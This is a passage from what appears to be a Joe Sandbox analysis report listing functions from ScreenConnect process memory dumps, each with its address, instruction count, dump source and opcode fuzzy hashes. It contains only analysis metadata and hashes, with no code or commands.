                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 17586fcdf36199ed60e7f5f3f1439846c0693b2383f6d8caa6946a900b690357
                                                                                    • Instruction ID: 43ac5dc2e7609fd3b991edb1f3021fa9a46075be5faaf75fb7c73598c616edd2
                                                                                    • Opcode Fuzzy Hash: 17586fcdf36199ed60e7f5f3f1439846c0693b2383f6d8caa6946a900b690357
                                                                                    • Instruction Fuzzy Hash: ADF0A43124A6804FC355D774D9929953FF4EF4B15034645EAD059CB273DA18A80BE761
                                                                                    Function 04616CF1 Relevance: .0, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8feb7ad8ddcaaa934d5f5df44dc7a851a48b75854a81acc3803a49789d1a3895
                                                                                    • Instruction ID: 972603e2d36d90b27480d729ae1550b04f6b42652ce617e6560a91ddb4502851
                                                                                    • Opcode Fuzzy Hash: 8feb7ad8ddcaaa934d5f5df44dc7a851a48b75854a81acc3803a49789d1a3895
                                                                                    • Instruction Fuzzy Hash: 0EF0AF366042009FD315DB79E88454EFFE2EF86210318C96EE108CB255EE31E8028B90
                                                                                    Function 046113EB Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: adf3ad8c4146289d0f8bb8d9d3560bd182deac7a1272d4aefc90420a34a994ad
                                                                                    • Instruction ID: 8d89c62be7154c330e6067041d0b6e5060f3f3f9ec5487b1ea8a98d32c2dbda8
                                                                                    • Opcode Fuzzy Hash: adf3ad8c4146289d0f8bb8d9d3560bd182deac7a1272d4aefc90420a34a994ad
                                                                                    • Instruction Fuzzy Hash: 84F0F6763042486FDF069F98AC605AF3FA7FBC8264B04401EF608D7251DE318C5197A1
                                                                                    Function 04617820 Relevance: .0, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2bf766e3b38faee6441d10f7758cd0d39b7d7787d057b162cfe77685aacce1b5
                                                                                    • Instruction ID: 0ec58a451a0ba80a9ffb4499ed273f8f8ff14aaa7b736b2d8715115fa6b71bdd
                                                                                    • Opcode Fuzzy Hash: 2bf766e3b38faee6441d10f7758cd0d39b7d7787d057b162cfe77685aacce1b5
                                                                                    • Instruction Fuzzy Hash: 84F0F07190A7888FC742CF78CC910E8BFF0DE0655031986D7D488DB6A2E220AE07C791
                                                                                    Function 0170D01C Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3518905043.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_170d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 147daeb578337570ac27b56fa128df6314f39a34b0e8cf11ad99c1b9b520eaa7
                                                                                    • Instruction ID: 8803c85fc62a60e6623f71cbe7fa00112ec6ea53d6354fc53cee822e0b594d84
                                                                                    • Opcode Fuzzy Hash: 147daeb578337570ac27b56fa128df6314f39a34b0e8cf11ad99c1b9b520eaa7
                                                                                    • Instruction Fuzzy Hash: D6F06272404344AEE722CE5AC884B62FFD8EB41674F18C55AED8C4F2D6C2799845CAB1
                                                                                    Function 046113F8 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9d15a7a9bc7dbac0a0dd1c83500ee013fb9125260d7b959687e0cc5d7b2c82ce
                                                                                    • Instruction ID: dddb2125738b306371f4b9d3834bd288fabf751800edc31e2a7875da61e0154e
                                                                                    • Opcode Fuzzy Hash: 9d15a7a9bc7dbac0a0dd1c83500ee013fb9125260d7b959687e0cc5d7b2c82ce
                                                                                    • Instruction Fuzzy Hash: 43F089363002196F9F059F999C409AF7BEBFBC8264B04402EF609D7250DE319C51A7A5
                                                                                    Function 046117C8 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7478e8b516df2b1f08c2789c875d97de945b4a56280217e7511558c9655feb4b
                                                                                    • Instruction ID: abe7c4598bc896cf2dc71e5c11a351fbf121fc3c42847039daaa88ec5b6ed517
                                                                                    • Opcode Fuzzy Hash: 7478e8b516df2b1f08c2789c875d97de945b4a56280217e7511558c9655feb4b
                                                                                    • Instruction Fuzzy Hash: BBF089753003015B9715BA6FB850997BBDEEBCD6543048529F529D7318FE60FC458BA0
                                                                                    Function 046113B5 Relevance: .0, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 463d100a1120c7c3078890c12d9aaacba9f7ee9ecff7831da47483c8785cc589
                                                                                    • Instruction ID: aef872db131ad450e218e20a05bc18eb5c454da3eb5f542cccfd92c2da19d6aa
                                                                                    • Opcode Fuzzy Hash: 463d100a1120c7c3078890c12d9aaacba9f7ee9ecff7831da47483c8785cc589
                                                                                    • Instruction Fuzzy Hash: B1F02732700208AFCF166FA4A8441AE3B53EB88220B144418F60A9B674EE359C52A751
                                                                                    Function 04614C00 Relevance: .0, Instructions: 32COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7486e343d8a0b9f3a8046a60d189da269ade6cdae5f76d7e8939da4489784686
                                                                                    • Instruction ID: 56573c1508f98c0e3f5c2a49822d3a00b5ff67c45a10b5736c77ab691be5d177
                                                                                    • Opcode Fuzzy Hash: 7486e343d8a0b9f3a8046a60d189da269ade6cdae5f76d7e8939da4489784686
                                                                                    • Instruction Fuzzy Hash: C3F0F6F9A0024ACFCF04EF69E5187AEBBB0F749315F004A25C1219B248EF742545CF92
                                                                                    Function 04614BF2 Relevance: .0, Instructions: 32COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 70acaa7e9ab8fa277ea40e716f5cd376f8292c920e864749aaa45c1fd28f0e73
                                                                                    • Instruction ID: 5ab2c626994ced513c9e44f0aef60cde0ba123e876dc8f9c3c58d2a05ee1a0f1
                                                                                    • Opcode Fuzzy Hash: 70acaa7e9ab8fa277ea40e716f5cd376f8292c920e864749aaa45c1fd28f0e73
                                                                                    • Instruction Fuzzy Hash: BAF0F6F590428A9FDB00EFA4EA597AEBFB0F745301F008A29C1219B259EF742541CF92
                                                                                    Function 04617061 Relevance: .0, Instructions: 32COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e2ecebc7e1f7383c6c4a6f305a4f1de992983250836917f745ad7971c3183165
                                                                                    • Instruction ID: aff4691445ddb62776f9d3af005ea45a5c12df86501923720cdcc19ff185c29c
                                                                                    • Opcode Fuzzy Hash: e2ecebc7e1f7383c6c4a6f305a4f1de992983250836917f745ad7971c3183165
                                                                                    • Instruction Fuzzy Hash: A2F0E2712053008FC314DF69E185A56BFE2EFC6715B0984ADE5498B3A2DA31FC02CB50
                                                                                    Function 04610482 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c4bc66515e92b4b313b5785f9c5023fcc11b8c5abbc775b356be4946b5578f8
                                                                                    • Instruction ID: 2a6da26ffcd6e9387f5805fe5b70edb23a47a4ccf02eda534cf96d99484e1aff
                                                                                    • Opcode Fuzzy Hash: 1c4bc66515e92b4b313b5785f9c5023fcc11b8c5abbc775b356be4946b5578f8
                                                                                    • Instruction Fuzzy Hash: EAF03A30700114CFDB14DF29C494AAEB7F1EF883107098069E805DB364EE35ED01DB90
                                                                                    Function 04610948 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5a57d61c3a333d2786653c4b16583a8f2f201f7beb52d984c6735cd5e87903a5
                                                                                    • Instruction ID: 0abd71d792aedaf035005adc8d4baaea4ca3f3f0a11206c1382820ff71016d97
                                                                                    • Opcode Fuzzy Hash: 5a57d61c3a333d2786653c4b16583a8f2f201f7beb52d984c6735cd5e87903a5
                                                                                    • Instruction Fuzzy Hash: 9FE06576704204AF5B44DE4ED450D5FBBAEDFD9260718C01AFA4CC7310E931E9428BA4
                                                                                    Function 04610448 Relevance: .0, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c07900820053a6ab07097104467bdf1a981b69b1ffefb4e712c257e777a78942
                                                                                    • Instruction ID: f318348dda15e47665d06862af319b51dcfea45fcec2b827ed8238d80819a632
                                                                                    • Opcode Fuzzy Hash: c07900820053a6ab07097104467bdf1a981b69b1ffefb4e712c257e777a78942
                                                                                    • Instruction Fuzzy Hash: 08F0B271E00219DF8B40DFADC84069EFBF4EF89200B24806AD918E7211E731AA12CB80
                                                                                    Function 04616D60 Relevance: .0, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3898f307eb282aec5d676adc35048f88d75326677619fb5ead2247e5cbb0d86
                                                                                    • Instruction ID: e2e637aecc076e64c4db22b7857f20042e962a65c57eab6d3b2d620c60ab040e
                                                                                    • Opcode Fuzzy Hash: f3898f307eb282aec5d676adc35048f88d75326677619fb5ead2247e5cbb0d86
                                                                                    • Instruction Fuzzy Hash: 4CE0C9B6D00119DF8790EFA899421DAFBB4EF58204B10806AC52DDB201E3368B039FD0
                                                                                    Function 04611704 Relevance: .0, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 841345c12c1b5b8f65e99e11c59485bfd099da55357c8a45385d809beaebeb56
                                                                                    • Instruction ID: 52b3688bf1f5523cc436d532137f804aaf5a37baa39e203fd4f268be268a0d21
                                                                                    • Opcode Fuzzy Hash: 841345c12c1b5b8f65e99e11c59485bfd099da55357c8a45385d809beaebeb56
                                                                                    • Instruction Fuzzy Hash: 26E020357012055FC314A51AE9405D7F7AEDBCD230B110438E20CC7359DD379C83C2A0
                                                                                    Function 04611708 Relevance: .0, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0b4f32b5ee0fcee77f0d0a4cbfdb8cffb876221058818026d3dc3f31432b3121
                                                                                    • Instruction ID: 792c33849474a237b30bcbc117eca1b1a51659020873ce70eae50aceba09da9a
                                                                                    • Opcode Fuzzy Hash: 0b4f32b5ee0fcee77f0d0a4cbfdb8cffb876221058818026d3dc3f31432b3121
                                                                                    • Instruction Fuzzy Hash: F7E086367052055BC318A52AE950997F7AEDBC9624B114479A10CC7359DE769C8386A0
                                                                                    Function 04617070 Relevance: .0, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9c6a6164451b4d501b454c940f13ba353464a591b597cba15308c8d21817b7f3
                                                                                    • Instruction ID: 5d82a33890fbdc3d98a36c7602ab35115fede937a275f908183af888fb9f4247
                                                                                    • Opcode Fuzzy Hash: 9c6a6164451b4d501b454c940f13ba353464a591b597cba15308c8d21817b7f3
                                                                                    • Instruction Fuzzy Hash: 28E06D303002008FC3149B5AD144D16B7E6EFC9725B1584A9E9098B3A1DB71FC41CB50
                                                                                    Function 04610852 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3accf7ec1fd12a6a36e3626d95ebeb4505a06f2e056dcd45f2061d07535b66e
                                                                                    • Instruction ID: 1d3c5d47c509d6c1f8a5fa4d5382656dfa27f6c52aacf27ed3921ae6081bfb43
                                                                                    • Opcode Fuzzy Hash: f3accf7ec1fd12a6a36e3626d95ebeb4505a06f2e056dcd45f2061d07535b66e
                                                                                    • Instruction Fuzzy Hash: 07E0DF753046505FD341D738D889D557FE5AF4A215B09C0DAE4088B3A3E671DC02CB80
                                                                                    Function 04612DB1 Relevance: .0, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e2a8e98a0eca7de39b2c1b12ac6f618e7ed7fcd9c402da46e4e9a8cf167ceb8b
                                                                                    • Instruction ID: d05e622e77ec34a525ff6cf4f9f52c51c4eaf2501ea7a441b181d103849ae0fd
                                                                                    • Opcode Fuzzy Hash: e2a8e98a0eca7de39b2c1b12ac6f618e7ed7fcd9c402da46e4e9a8cf167ceb8b
                                                                                    • Instruction Fuzzy Hash: 59E0DF30505249FFCB01EFB4E89269CBFF1EB4620070048DED408EB205EA342E55E751
                                                                                    Function 04616D70 Relevance: .0, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                                    • Instruction ID: bc719659558a54c49e63a21587874457eef9050322df3ce5a6f4a54ce7821143
                                                                                    • Opcode Fuzzy Hash: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                                    • Instruction Fuzzy Hash: 9DE0B675E002299F8B80EFADD9015AEFBF4EF48210B10846AD91DE7201E7319B12CFC1
                                                                                    Function 046166E0 Relevance: .0, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b6362517943327abb4771ad5c6e1b75dac1138d83576f961e865c9fbcae2d3
                                                                                    • Instruction ID: 827c813bd9c759e0e38dcd291993df722469c09d0142cd9067a628c2e9717c8f
                                                                                    • Opcode Fuzzy Hash: e5b6362517943327abb4771ad5c6e1b75dac1138d83576f961e865c9fbcae2d3
                                                                                    • Instruction Fuzzy Hash: 92D052343201248FCB88EB78E4648AA37DAAF8892035080A4E00DCB728EE20EC0187E0
                                                                                    Function 04610860 Relevance: .0, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 35711ad04a7219c9c22c37f8ffc6c104275a1c34e2daaaf2bbd4377fff069f7f
                                                                                    • Instruction ID: ccb52adb841789444d735a3c0be800801973f1a73bee88243d68afb01cdf6448
                                                                                    • Opcode Fuzzy Hash: 35711ad04a7219c9c22c37f8ffc6c104275a1c34e2daaaf2bbd4377fff069f7f
                                                                                    • Instruction Fuzzy Hash: F1D05E353501245FD744EB29E985C6577EAEF89614755C0A9E90CCB362D971EC018A90
                                                                                    Function 046129A8 Relevance: .0, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3e576e3edf8be260be2b06cc96c91efcab61f39f34a1cf0dec30ae543d406058
                                                                                    • Instruction ID: ac0a6b3592793314e39c14455891b7a0d6bdbba6c3090c3c2510bc497398c68b
                                                                                    • Opcode Fuzzy Hash: 3e576e3edf8be260be2b06cc96c91efcab61f39f34a1cf0dec30ae543d406058
                                                                                    • Instruction Fuzzy Hash: 24D05E9381D0808FE31213BE78B40A03FB0FA6A3A135C48CAD046FB177F209A44BE391
                                                                                    Function 04612DC0 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3893605690178638e601f7620635a42c72634b8d73d8066e80690cf6dd6970b3
                                                                                    • Instruction ID: 35570e766266d76f7d5bc6ed9259c47602c267768ef7e4904baa7ce7f0f8d8f6
                                                                                    • Opcode Fuzzy Hash: 3893605690178638e601f7620635a42c72634b8d73d8066e80690cf6dd6970b3
                                                                                    • Instruction Fuzzy Hash: 72D01770A01209FF8B44EFA9E90659DBBF9EB49204B1085ADD809E7204EA316E05AB91
                                                                                    Function 04610AE0 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9e6962889a3a6aa106dcd853e8eb97b41596c6520130c8cd35849bf96a87d71f
                                                                                    • Instruction ID: 63fcca93dbf28239def435e48c84d56021de0da96775c79c10176ed02d22c4b7
                                                                                    • Opcode Fuzzy Hash: 9e6962889a3a6aa106dcd853e8eb97b41596c6520130c8cd35849bf96a87d71f
                                                                                    • Instruction Fuzzy Hash: 8DE0C232404708CEC301BB78C4144A9BBB8EE91301F00C64EE84D67022FF70E184E742
                                                                                    Function 046177E0 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4880ac3f5e1afedc1c13c4b9dbbd9243fc259d02a29af83b9281abdbfac50ecf
                                                                                    • Instruction ID: 3858df2b0ac10afd01c3851cbe0606e0abfab8a4f1f5f6eb5b2662afa5fc168f
                                                                                    • Opcode Fuzzy Hash: 4880ac3f5e1afedc1c13c4b9dbbd9243fc259d02a29af83b9281abdbfac50ecf
                                                                                    • Instruction Fuzzy Hash: 3BD01770A01209EFCB00EFBAE90059DBBF9EB88214B1046A8D409E7204EA326E449B91
                                                                                    Function 04610AF0 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0868c0991fbe8e1b649604820378c0cf0997bb06d072725a1ffca3cfb110281
                                                                                    • Instruction ID: d0bc743ba0a17a61e80db4432c734d3c2eafe3fa4bb96b600bacadb279164a66
                                                                                    • Opcode Fuzzy Hash: e0868c0991fbe8e1b649604820378c0cf0997bb06d072725a1ffca3cfb110281
                                                                                    • Instruction Fuzzy Hash: A9D0C932814B0D8AC701BBB8D4544A9F7B8EED5210F00DB5AE88A67122FFB0E6D0D681
                                                                                    Function 04614B92 Relevance: .0, Instructions: 7COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ece8574fce249474f96272c35e3a5587dc3c70cae32a8597006811f8922dd735
                                                                                    • Instruction ID: 6410812b8a09cb153ee5f6bbc80d324e90729e1922e6470cbf252d73fe1e2c26
                                                                                    • Opcode Fuzzy Hash: ece8574fce249474f96272c35e3a5587dc3c70cae32a8597006811f8922dd735
                                                                                    • Instruction Fuzzy Hash: 9DC0929A44E3E06EDB13A7F08860915BFA0BE4310938E82DFC495CF1A3E818E454C376
                                                                                    Function 046118E0 Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fab8d04d4e65521090f095dab0a3d85deb17eb99e6f7bc0bc97259446380aa2c
                                                                                    • Instruction ID: be3ebe1a9b90e026e36c10f9e2a692f655b2d75ad1c3997949e09ee87598a3e4
                                                                                    • Opcode Fuzzy Hash: fab8d04d4e65521090f095dab0a3d85deb17eb99e6f7bc0bc97259446380aa2c
                                                                                    • Instruction Fuzzy Hash: 09A011302000008BCA08CA00C20880EBBA2ABE0300B00CA28A00AC20288A308C00EA02

                                                                                    Non-executed Functions

                                                                                    Function 017BD6F8 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3519752168.00000000017B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_17b0000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hxq
                                                                                    • API String ID: 0-2956916855
